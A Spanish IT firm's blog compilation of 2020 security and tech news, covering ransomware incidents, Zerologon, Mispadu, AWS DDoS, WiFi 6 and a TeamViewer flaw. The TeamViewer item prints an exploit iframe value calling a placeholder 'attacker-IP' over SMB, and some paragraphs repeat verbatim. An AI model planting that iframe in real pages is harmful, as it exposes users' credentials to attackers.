En este 2020 según el CNI los ataques calificados como muy graves se han duplicado. «Los ciberdelincuentes están aprovechando el crecimiento de las compras online realizadas durante estos días con motivo del Black Friday y Cyber Monday para recopilar información personal y bancaria de los compradores más ingenuos», ha alertado Dani Creus, analista senior de Seguridad del equipo de Investigación y Análisis (GReAT) de Kaspersky. La pandemia y el confinamiento total de principios de año han disparado el consumo de internet en España. Un aumento del uso de dispositivos conectados que ha llevado aparejado un importante aumento de los ataques en la Red. Según ha revelado esta semana el Centro Criptológico Nacional, los incidentes en el ciberespacio detectados por el CNI con el baremo de riesgo muy alto han duplicado ya a los registrados en 2019, mientras que los ataques críticos han superado también a los del pasado año.
El problema ha afectado especialmente a Europa, pero también a algunas zonas de EE UU, India o Japón. Los principales servicios de Alphabet (Google, Gmail, Youtube y el servicio de almacenamiento en la nube) han registrado este lunes una caída de unos 40 minutos en todo el mundo, según la web Downdetector, especializada en rastrear fallos en sistema. La gran implantación de los productos de Google ha provocado que este fallo haya afectado a muchas empresas a lo largo del orbe. Desde universidades a firmas financieras o medios de comunicación. También el juego Pokémon GO ha sufrido interrupciones porque depende del sistema de mapas de Google. Google, en su «Workspace Status Dashboard», un panel en el que monitorea el estado de sus productos, fue avisando que cada uno de los problemas «debería estar resuelto para la mayoría de los usuarios afectados». La empresa, con sede en Mountain View (California), fue repitiendo ese mismo mensaje para todos los productos afectados: su correo Gmail, el popular portal de vídeos de internet Youtube, el servicio de alojamiento de archivos Google Drive y la plataforma que usan las clases para la enseñanza por internet, Google Clasroom. Ahora bien, ¿podemos vivir sin Google?
Sopra Steria se une a la larga lista de empresas víctimas de ransomware. La empresa francesa de servicios digitales ha anunciado que ha sufrido un ciberataque durante la noche del 20 de octubre de 2020. Estas mismas fuentes nos indican que la variante del ransomware responsable del ataque ha sido Ryuk y que le vector de ataque ha sido una campaña de phishing dirigida. Estos dos datos están pendientes de ser confirmados. Actualmente los equipos del grupo están trabajando para que la compañía recupere la normalidad, dentro de lo posible. Sin embargo, la empresa no ha proporcionado ningún dato del ransomware cuando se le preguntó. Con referencia a sus propias fuentes, los dominios de la empresa fueron pirateados utilizando el ransomware Ryuk. Aún no se conoce el alcance del cifrado y la cuestión de si la información también se extrajo de antemano. Sopra Steria se ve a sí misma como una consultora líder y tiene casi 50.000 empleados. Sopra Steria es una empresa importante para impulsar la transformación de sus clientes.
WiFi 6 es y será la próxima generación de WiFi, pero con muchas más ventajas sobre el estándar actual, especialmente en lo que se refiere a la conexión de dispositivos de manera simultánea y la velocidad de conexión. Más alcance y cobertura incluso en espacios saturados: El avance que consigue es gracias, en parte, a su modulación 1024-QAM, lo que permite que en un determinado ancho de banda se pueda enviar más cantidad de información por símbolo que con los protocolos WiFi anteriores. Esto es especialmente interesante en escenarios de alta densidad de conexiones a una red WiFi, que es donde el nuevo estándar espera poder incrementar en 4 veces el rendimiento promedio por usuario respecto al anterior. Lo verdaderamente interesante en la futura WiFi 6 no está pues en la velocidad máxima por dispositivo sino en la mejora global que experimentarán los usuarios en situaciones cada vez más habituales y donde queremos tener muchos dispositivos conectados a la misma red WiFi. Incluso en el hogar. También habrá mejora en la latencia, que será mucho menor, y por supuesto en la seguridad, al estar preparada para usar WPA3. Otra característica importante de la nueva WiFi 6 es que, al contrario que la WiFi 5 o 802.11 ac, el nuevo estándar puede operar tanto en la frecuencia de 2,4 Ghz como en la de 5 Ghz. La actual WiFi 5 puede hacerlo también pero en realidad lo consigue «tomando» la banda de los 2,4 Ghz del protocolo 802.11 an. Menos consumo para los dispositivos conectados: Otro factor a tener en cuenta es la autonomía de los dispositivos. De esa mejora se se encarga la tecnología Target Wake Time (TWT) con este funcionamiento, los dispositivos pueden mantenerse en modo de reposo (y ahorrar energía) hasta que llegue su momento fijado y negociado.
El pasado 11 de septiembre era cuando se daba a conocer que la aseguradora Adeslas había sido víctima de un ciberataque el cual había «bloqueado» sus sistemas, dejando a la compañía inoperativa o con un funcionamiento a medias. En ese momento se dio la información muy escueta, sin entrar en detalles del nivel de gravedad del asunto. Ahora, más de tres semanas después, el problema sigue sin resolverse. Según informa otro medio, «Adeslas ha sido víctima de uno de los temidos ransomware que ya han afectado a muchísimas otras instituciones y ahora han metido en serios problemas a esta gran empresa«. Las consecuencias que ha tenido este ciberataque se pueden apreciar a simple vista tanto en la web como en los perfiles de redes sociales de la aseguradora. Fuentes de SegurCaixa Adeslas han confirmado a MERCA2 el ataque a la par que están trabajando en la solución del mismo. “Se ha activado el plan de contingencia y se está trabajando para solucionar los efectos”, han matizado. Desde Caixabank han confirmado a su vez que no ha afectado a la entidad financiera, solo a SegurCaixa Adeslas. Un ataque de Ransomware es una forma de malware que bloquea los archivos o dispositivos de los usuarios y luego reclama un pago online anónimo. Los ataques Ransomware han aumentado un 160% en España en los últimos 3 meses. “Las organizaciones de todo el mundo se encuentran en medio de una ola masiva de ataques Ransomware. A medida que estos ataques crecen tanto en frecuencia como en intensidad, su impacto en los negocios aumenta exponencialmente tanto, que hay una víctima afectada cada 10 segundos”, señala Mario García, director general de Check Point para España y Portugal. “El Ransomware está rompiendo récords en este 2020, sobre todo como consecuencia de la llegada del coronavirus y el teletrabajo. Desde TLC Sistemas y Teloconfiguro, abogamos por una inversión en medidas de seguridad empresariales.
Es un fallo de seguridad que afecta a los usuarios de Windows Server. La empresa de ciberseguridad Secura fue quien le puso el nombre de vulnerabilidad Zerologon, que en caso de ser utilizada por un ciberdelincuente, podría conseguir privilegios de administrador sobre un dominio y tener el control total sobre este. CVE-2020-1472 es una vulnerabilidad de elevación de privilegios que existe en MS-NRPC. Netlogon es un componente de autenticación central de Microsoft Active Directory. Además, Netlogon es un servicio proporcionado por controladores de dominio para proporcionar un canal seguro entre un ordenador y el controlador de dominio. La vulnerabilidad Zerologon se le ha asignado una clasificación CVSS de 10. Hay que señalar que esta puntuación es la máxima clasificación de gravedad posible para un fallo de software, lo cual indica su gravedad. En caso de no aplicar dicho parche, estamos dejando nuestros activos más críticos desprotegidos de una amenaza real. Además, podemos afirmar que no se trata de un error teórico ya que los atacantes pueden utilizarlo de manera activa contra las empresas. Es por ello que desde Servidores por Piezas y TLC Sistemas, recomendamos tener siempre los equipos actualizados.
La multinacional Mapfre aseguradora española ha sido víctima de un ataque denominado «Ransomware», según ha comunicado la misma compañía a través de su página web. Se trata de una comunicación muy breve dada por la compañía, en la que informan de la incidencia, si bien no dan información técnica sobre dicho ataque. Según dicha comunicación, el ataque sí que ha tenido incidencia en sus operaciones, si bien, y esto me parece un aspecto destacable, partían de contar con un plan de contingencia con procedimientos alternativos, que fueron desplegados por Mapfre al detectar el ataque. Algo que, según afirma la compañía, ha permitido que puedan mantener su operativa, si bien no en las condiciones de servicio habituales, algo por lo que se disculpan en el comunicado digno de agradecer para sus asegurados. La aseguradora Mapfre afirma que «no compromete la información de clientes».
La compañía china Huawei se ha convertido por primera vez en el mayor proveedor de teléfonos inteligentes del mundo durante el segundo trimestre de 2020, superando a otros grandes como el todo poderoso Samsung o Apple, según informa la firma de analistas Canalys. Debido a las sanciones impuestas por el Gobierno estadounidense a la empresa, las exportaciones de Huawei cayeron un 27% durante el segundo trimestre del año, sin embargo, su presencia en China aumentó un 80% durante el mismo periodo, por lo que ahora vende el 70% de sus ‘smartphones’ en territorio chino. Los envíos de celulares Huawei durante los meses de mayo a junio alcanzaron las 55,8 millones de unidades, un 5 % menos respecto al mismo periodo del año anterior. Por su parte, Samsung, el segundo mayor proveedor de ‘smartphones’, envió 53,7 millones de dispositivos, un 30 % menos que en el segundo trimestre de 2019. De acuerdo a Ben Stanton, uno de los analistas principales de Canalys, «Huawei ha aprovechado al máximo la recuperación económica china» tras la crisis del coronavirus «para reavivar su negocio de teléfonos inteligentes».
En España estamos avanzado poco a poco en la digitalización, nos está costando, pero las pequeñas y medianas empresas del país siguen sin aprovechar todo el potencial del E-Commerce, algo que llevamos tiempo diciendo y no por el momento en el que vivimos, que obviamente nos influye y mucho. Así lo destaca el Índice de la Economía y la Sociedad Digitales (DESI) de la Comisión Europea de 2020, que sitúa a España en la posición 11º entre los 28 países miembros, y destaca un avance respecto a la puntuación del año anterior. El informe señala que, pese a los logros conseguidos, las Pymes españolas no apuestan aun lo suficiente por el «E-Commerce», siendo tan solo el 19% el que utiliza este canal de venta. “Tenemos una idea equivocada en el pequeño comercio de que el uso de herramientas digitales de venta es un proceso complejo que, aunque aporte beneficios, requiere de una importante inversión de recursos y tiempo». Sin embargo, esto no es así. Las Pymes deben perder el miedo al mercado digital y aprovechar todas las oportunidades de negocio que este entorno ofrece, nuestro departamento de de desarrollo puede realizar un estudio personalizado, indicando en cada situación la mejor forma de estar presente. “Tenemos un importante desafío para las Pymes en materia digital, pero sobre todo insistimos en que existe una oportunidad. Los esfuerzos realizados se convertirán en una ventaja competitiva capaz de hacer crecer nuestro negocio” TLC Sistemas estamos aquí para ayudaros a dar ese salto.
Hoy os tenemos que informar de una vulnerabilidad detectada sobre TeamViewer, la cual permitiría que un posible intruso accediera a ese ordenador sin dejar rastro y así poder llevar a cabo diferentes tipos de ataques, como conseguir datos del mismo, copia ficheros, etc… Es una realidad que en muchas ocasiones surgen fallos de seguridad que afectan a todo tipo de software que utilizamos en nuestro día a día. Pueden comprometer nuestra privacidad y poner en riesgo los dispositivos. Estas vulnerabilidades generalmente reciben actualizaciones por parte de los desarrolladores. Desde TeamViewer nos han informado de que se ha lanzado un parche para corregir este importante fallo. La vulnerabilidad ha sido registrada como CVE-2020-13699 y ha sido calificada de alta gravedad. Para ejecutar un ataque, un usuario necesitaría navegar a una página maliciosa que carga un iframe en el navegador web, posiblemente oculto o tan pequeño como un píxel, para evitar ser visto por un intruso. El iframe se carga a sí mismo usando el esquema de URI «teamviewer10:», que le dice al navegador que inicie la aplicación TeamViewer instalada en el equipo. Estos esquemas de URI personalizados son utilizados por aplicaciones instaladas localmente que permiten al usuario iniciarlos desde su navegador. Por ejemplo, las URL que comienzan con «skype:» en el navegador iniciarían Skype. Otras aplicaciones de uso común como Slack, Zoom y Spotify usan estructuras similares. Lo que haría el atacante para aprovechar esta vulnerabilidad de TeamViewer, es establecer el atributo src del iframe en ‘teamviewer10: –play \ attacker-IP share fake.tvs’. Este comando lo que hace es que la aplicación de TeamViewer que esté instalada se conecte al servidor del atacante a través del protocolo SMB.
Equivocarse es de sabios, o eso dicen, pero las malas decisiones son difíciles de olvidar porque es tu propia conciencia quien te recuerda que fuiste tú quien tomó la decisión y que perdiste tu oportunidad. En la historia más reciente del mundo empresarial, la negativa de Excite a hacerse con Google a precio de ganga, se sitúa como uno de los fracasos más sonados. Corría el año 1999 cuando George Bell, CEO de Excite.com recibió una oferta inicial para comprar Google por un millón de dólares. El ejecutivo rechazó la propuesta y Larry Page y Sergei Brin, los jóvenes fundadores del sitito de búsquedas, rebajaron el precio de venta a 750.000 $, con la esperanza de hacer más atractiva la venta. La negociación tenía lugar –situémonos-, en los años en los que Yahoo era el rey de las búsquedas y el señor Bell, que temía que los usuarios salieran de su portal si se introducían en Google, no supo ver el potencial que podría ofrecerle. Finalmente, las negociaciones no llegaron a buen puerto y Excite dejó escapar a Google. Desde entonces la suerte corrió de muy distinta manera para ambas compañías. Por una parte Excite prácticamente desapareció cuando en 2004 Ask Jeeves la adquirió y la convirtió en Ask.com; mientras, el pequeño e insignificante buscador se convirtió en el gigante que hoy todos conocemos, casi imposible de esquivar cuando uno navega por Internet y con un valor en bolsa del entorno de un billón de dólares. La negativa de Bell a comprar Google para Excite fue una mala decisión empresarial, a toro pasado y si miramos los números, aunque está claro que si aquella operación hubiera llegado a buen puerto, Google no sería la compañía que hoy conocemos. Preguntado sobre este asunto por “Internet History Podcast”, Bell justificó su negativa más allá de las dudas empresariales, al hecho de que Larry Page mantuvo unas negociaciones muy duras y exigentes.
El envejecimiento de la población es un hecho real. El aumento de la esperanza de vida, acortamiento de la vida laboral y la jubilación anticipada son las razones principales para el crecimiento de este sector. Con el auge de las nuevas tecnologías el distanciamiento de este sector con la sociedad parece aún mayor. Es de gran importancia destacar que la implementación de las nuevas tecnológicas en nuestra sociedad actual supone importantes ventajas para el sector de la Tercera Edad, sin embargo, se sienten alejadas de ellas. Resulta evidente que este distanciamiento genera una desigualdad en el uso y provecho de las nuevas tecnologías que puede deberse a estas causas: La utilidad: Muchos mayores desconocen cual es la utilidad de algunos dispositivos e instrumentos que puede mejorar su calidad de vida. El envejecimiento de la población es un hecho real. El aumento de la esperanza de vida, acortamiento de la vida laboral y la jubilación anticipada son las razones principales para el crecimiento de este sector. Con el auge de las nuevas tecnologías el distanciamiento de este sector con la sociedad parece aún mayor. Es de gran importancia destacar que la implementación de las nuevas tecnológicas en nuestra sociedad actual supone importantes ventajas para el sector de la Tercera Edad, sin embargo, se sienten alejadas de ellas. Resulta evidente que este distanciamiento genera una desigualdad en el uso y provecho de las nuevas tecnologías que puede deberse a estas causas: La utilidad: Muchos mayores desconocen cual es la utilidad de algunos dispositivos e instrumentos que puede mejorar su calidad de vida. La complejidad en el uso: A muchos les inquieta el hecho de adentrarse en un mundo demasiado complejo para ellos. Muchas personas no se atreven a utilizar estas herramientas por miedo a meter la pata, piensan que en cualquier momento pueden tocar una tecla inadecuada y perder toda la información o incluso borrar el contenido del disco duro. El sentimiento de desfase: Según las últimas estadísticas, la mayoría de los adultos mayores que se introducen de forma autónoma en el mundo de las nuevas tecnologías suelen contar con una edad de entre 50-55 años. Por lo cual, existe un sentimiento de desfase con respecto a estos nuevos instrumentos. Capacidad económica reducida: La capacidad de acceso a la tecnología más actual por parte del sector de la Tercera Edad es más dificultoso, debido a los altos costes que aun supone. Nuestros mayores pueden padecer de cierta torpeza, pero no son tontos, de manera que con los conocimientos y las herramientas adecuadas pueden disfrutar de todas las posibilidades que ofrece la tecnología de una manera segura. Ahora bien, nuestro rol y nuestras acciones son un elemento fundamental para que así sea. Y aunque el maldito COVID nos ha robado a muchos de ellos, otros tantos siguen aquí con nosotros, regalándonos sonrisas y disgustos. Por eso nos toca ahora velar por su seguridad (ciberseguridad), y no nos podemos permitir fallarles.
Tener una página web profesional o no tenerla puede ser la clave que determine el futuro de tu negocio. Con el cataclismo del coronavirus, hemos podido corroborar cómo el mercado ha permanecido activo, ajeno a la desolación de las calles, y los consumidores han cubierto sus necesidades y buscado soluciones a través de Internet. En medio del caos, solo los que estaban preparados para el e-commerce (comercio electrónico) o los que pudieron dar el salto a tiempo, han podido sortear el temporal desde una zona de confort. La oportunidad de llegar a los clientes a través de una página web profesional no solo garantiza la continuidad de una empresa, más allá de que las puertas estén abiertas o cerradas, sino que dispara la rentabilidad de la misma dado que permite una asistencia a los clientes en todo momento y desde cualquier lugar, sino que además brinda la oportunidad de presentarse como un gran escaparate en el que aparecen todos los productos que se ofrecen y los servicios que se prestan. Los expertos de TLC SISTEMAS señalan algunas de las razones por las que una empresa debe contar con una página web profesional. Credibilidad y confianza Cuando un cliente potencial encuentra a una empresa en Internet siente mayor seguridad a la hora de contactar con ella. Su presencia en la web, a la vista de cualquiera, ofrece seriedad y profesionalidad. Accesibilidad Una página web profesional permite que cualquiera pueda acceder a la empresa desde cualquier lugar. No importan las fronteras, ni los kilómetros. El mejor escaparate Internet es el canal más rápido para encontrar cualquier información y una empresa puede ofrecer su mejor imagen a través de su página web profesional. El escaparate digital le permite mostrar todos sus productos y servicios y actualizarlos de forma periódica. El mejor canal para disparar los ingresos Un negocio permanece abierto a través de su página web profesional a cualquier hora del día y de la semana, lo que se ha venido a llamar un 24×7, lo que facilita un mayor número de ventas y por tanto generando ingresos. Contacto La web permite un canal de contacto directo con el cliente, pero además ofrece la información de forma rápida y dinámica.
El grupo de hackers Anonymous ha hecho una llamada a través de Twitter para que los usuarios de Tik Tok se borren la aplicación por razones de seguridad según anuncian. A través de su perfil @YourAnonCentral, los hacktivistas piden «eliminar Tik Tok ahora. Si conoces a alguien que lo está usando, explícales que es esencialmente Malware operado por el gobierno chino que ejecuta una operación de espionaje masivo». Según esta publicación de Reddit, TikTok recopila diversos datos de sus usuarios, entre los que se incluye información sobre el hardware del teléfono (incluido el tipo de CPU, número de curso, ID de hardware, dimensiones de pantalla, DPI, uso de memoria, espacio en disco, etc.); información relacionada con la red, como la IP, IP local, enrutador MAC, nombre del punto de acceso WiFi. La aplicación china también recoge datos sobre otras aplicaciones instaladas en el dispositivo, incluidas las aplicaciones eliminadas; si el dispositivo está rooteado / liberado; GPS haciendo ping cada 30 segundos y un servidor proxy local en su dispositivo para transcodificar medios. Por el momento, no se ha podido confirmar la veracidad de esta información publicada en Reddit. TikTok no ha hecho ningún comentario sobre el asunto. La aplicación china también recoge datos sobre otras aplicaciones instaladas en el dispositivo, incluidas las aplicaciones eliminadas; si el dispositivo está rooteado / liberado; GPS haciendo ping cada 30 segundos y un servidor proxy local en su dispositivo para transcodificar medios. Por el momento, no se ha podido confirmar la veracidad de esta información publicada en Reddit. TikTok no ha hecho ningún comentario sobre el asunto. En el mismo hilo de tuits publicados por Anonymous, también asegura que «Tiktok está recolectando datos sobre niños y adolescentes para monitorear su alcance de mercado y desarrollo político; para encontrar las mejores metodologías para forzarlos en los próximos 5 a 10 años. Esto le da a China una ventaja sobre la manipulación de grandes sectores de la sociedad en varios países.»
La compañía ESET en su delegación en España, ha alertado de una nueva campaña maliciosa que estaría extendiendo el troyano bancario «Mispadu» en España, México y Portugal utilizando como gancho cupones de descuento de «Amazon». La campaña maliciosa emplea una web preparada por los ciberdelincuentes que simula pertenecer a Amazon y que se promociona a través de anuncios mostrados en «Facebook». En la web falsa se pueden ver auténticas ofertas sin sentido, accesibles simplemente pulsando un botón de «Generar cupón». Si el incauto compradoro cae en la trampa, será redirigido a un enlace externo desde donde se descargará un archivo comprimido de nombre “Cupón-02190.zip”. Este archivo contiene en su interior dos ejecutables. Un “Cup¢n-92190.msi” correspondiente al código malicioso encargado de iniciar la cadena de infección en el sistema de la víctima, mientras que el otro archivo se trata del instalador renombrado de Mozilla Firefox en portugués. Este tipo de cadena se caracteriza por la ejecución de varios scripts (En informática, un script, secuencia de comandos que se usa para designar a un programa relativamente simple) de Visual Basic en varias fases, algunos de ellos ejecutados dentro de un mismo proceso. «Este proceso de infección hace que, con las soluciones de seguridad adecuadas, sea posible detectar varios de los procesos que componen el malware conforme se van ejecutando», explican desde ESET. El resumen es que el usuario terminará infectado con Mispadu, un tipo de troyano bancario cuya finalidad es robar las credenciales de acceso a los servicios de banca on-line de varias entidades que operan en los países donde se está reproduciendo la campaña: España, México y Portugal.
El servicio de servidores y centros de datos de Amazon, más conocido como AWS o Amazon Web Services, ha sufrido un ataque DDoS (Ataque de denegación de servicio) en febrero de este año. El ataque, publicado ahora por la propia Amazon, supuso un pico de volumen de tráfico de nada más y nada menos que 2,3 Tbps, es decir, 2,3 Terabits por segundo, o lo que es lo mismo 2.300 Gb de datos cada segundo. Se trata, según la compañía, del mayor ataque DDoS jamás registrado en la historia de la informática y, a pesar de ello, parece que el sistema de seguridad AWS Shield fue capaz de proteger a los servidores y sus clientes del ataque. Ya que ninguno de sus servicios se vio comprometido. Los ataques DDoS, que ya han sufrido otras empresas internacionales, o incluso datacenters como ovh, se basan en lanzar multitud de peticiones y tráfico hacia un objetivo, generalmente basándose en enormes redes de bots o PCS y otros dispositivos infectados) para saturar los servidores e infraestructuras del objetivo hasta que dejan de funcionar. Cada vez se mitigan más ataques DDoS Sin embargo, los ataques DDoS han estado de capa caída en los últimos años debido a que la mayoría de operadores, CDN y otros servicios relacionados con Internet han implementado nuevos mecanismos para mitigar el efecto de estos ataques, y sobre todo asegurándose de que los sistemas vulnerables a memcached no sean accesibles. La mayoría de ataques DDoS que han tenido lugar en 2020 han generado un tráfico de alrededor de 500 Gbps. En el primer trimestre, Link11 recibió uno de 406 Gbps. Cloudflare recibió uno en el mismo periodo de 550 Gbps. El más reciente, mitigado por Akamai este mismo mes, fue de 1,44 Tbps. Sin embargo, esas cifras siguen siendo muy poco comunes, ya que la mayoría de estos ataques suelen ser de media de 5 Gbps. Cloudflare afirma que el 92% de los ataques DDoS que mitigaron en el primer trimestre del año eran inferiores a 10 Gbps, y el 47% eran incluso más pequeños con sólo 500 Mbps.
A principios de este mes, la organización sin fines de lucro Reporteros sin Fronteras creó «La biblioteca sin censura» dentro del videojuego Minecraft. La idea era usar la biblioteca, que vive en un servidor abierto en el Minecraft mundo, para albergar libros llenos de información que han sido censurados en países de todo el mundo. Para esta proeza, se han usado 24 constructores de 16 países diferentes para diseñar y crear la biblioteca. Para proteger el trabajo de periodistas en lugares donde los gobiernos autoritarios censuran habitualmente a los medios independientes y no tanto, la organización sin fines de lucro «Reporteros sin Fronteras» ha implementado una nueva biblioteca virtual impresionante, alojada en el mundo del popular videojuego «Minecraft«. Los jugadores de todo el mundo ahora pueden acceder a tesoros de libros digitales dentro de The Uncensored Library. Cada libro contiene artículos censurados en su país de origen. Los usuarios pueden leer las historias, pero no pueden cambiarlas. Reporteros sin Fronteras agregará más libros a la biblioteca a medida que los gobiernos continúen censurando los informes. Ahora bien, nos encontramos con un problema potencial: los ciudadanos podrían ser identificados por sus nombres de usuario en Minecraft, y sus registros de actividad demostrarían que habrían podido visitar la biblioteca. Es dudoso, por supuesto, que la compañía matriz Microsoft voluntariamente entregue esta información, pero aún es algo a considerar.
Google ha lanzado una herramienta completamente gratuita que nos permitirá realizar un avanzado escáner de seguridad, su nombre es «Tsunami« y tiene como objetivo el detectar vulnerabilidades críticas en diferentes equipos. Pero ¿En qué consiste y cómo podemos usarlo?, desde aquí os vamos a dar unas nociones básicas de ello. La herramienta publicada por Google se centra en dos principales tareas: Reconocimiento: el primer paso que realiza Tsunami es detectar puertos abiertos, después trata de identificar los protocolos, servicios, y otro software que se ejecuta en el host de destino. Tsunami hace uso de la potente herramienta Nmap para realizar esta tarea, ya que es simplemente el mejor escáner de redes, host y puertos abiertos que podemos utilizar. Concretamente, hace uso de Nmap 7.80. Verificar la vulnerabilidad: basándose en la información recogida anteriormente, Tsunami selecciona todos los plugins que tengamos para identificar los servicios. Para confirmar que realmente existe, Tsunami ejecuta un exploit para comprobar si realmente funciona. ¿Qué es Nmap? Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos. Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática, para ello Nmap envía unos paquetes definidos a otros equipos y analiza sus respuestas.
Expertos investigadores de ESET han descubierto varias herramientas post-compromiso previamente indocumentadas utilizadas de manera activa por el grupo de APT Gamaredon en varias campañas maliciosas. Una de las herramientas, una macro VBA dirigida a Microsoft Outlook, utiliza la cuenta de correo electrónico del objetivo para enviar correos electrónicos de spearphishing a contactos en la libreta de direcciones de Microsoft Office de la víctima. También analizamos otras herramientas Gamaredon que tienen la capacidad de inyectar macros maliciosas y plantillas remotas en documentos de Office existentes. El grupo Gamaredon activo desde principios de 2013. Ha sido responsable de varios ataques, principalmente contra instituciones ucranianas, como lo demuestran varios informes al respecto y organismos oficiales ucranianos a lo largo del tiempo.
SLS, una nueva variante de Spectre Según noticias reconocidas por la propia ARM en un documento técnico publicado en estos días, SLS es poco más que una variante de Spectre que eso sí, solo afectaría a los procesadores ARM-A. En los procesadores que sufren esta vulnerabilidad, mientras se desarrollan las operaciones de computación por adelantado como parte del proceso de ejecución especulativa, cuando hay un cambio en el flujo de control de instrucciones de la CPU, esta reacciona ejecutando las instrucciones que se encuentran linealmente en su memoria, lo que permitiría a un atacante inyectar malware y tomar el control de la máquina. La buena noticia sin embargo es que según el fabricante de chips, la probabilidad de que algo así pueda llegar a pasar, es «bastante baja». Como explican en su documento, «en la práctica, esta es una vulnerabilidad bastante difícil de explotar, y una explotación práctica aún no ha sido demostrada. Sin embargo, no hay que descartar por completo esta posibilidad». Al mismo tiempo, la compañía está trabajando el desarrollo de parches que corrijan este problema en los principales sistemas operativos, incluidos algunos con tan poca cuota de mercado como FreeBSD y OpenBSD. Una vez aplicados, estos parches serían capaces de parar ese tipo de ataques a nivel de firmware. Además y a diferencia con lo que ocurre con Spectre y Meltdown, instalar los mismos no afecta al rendimiento de las máquinas.
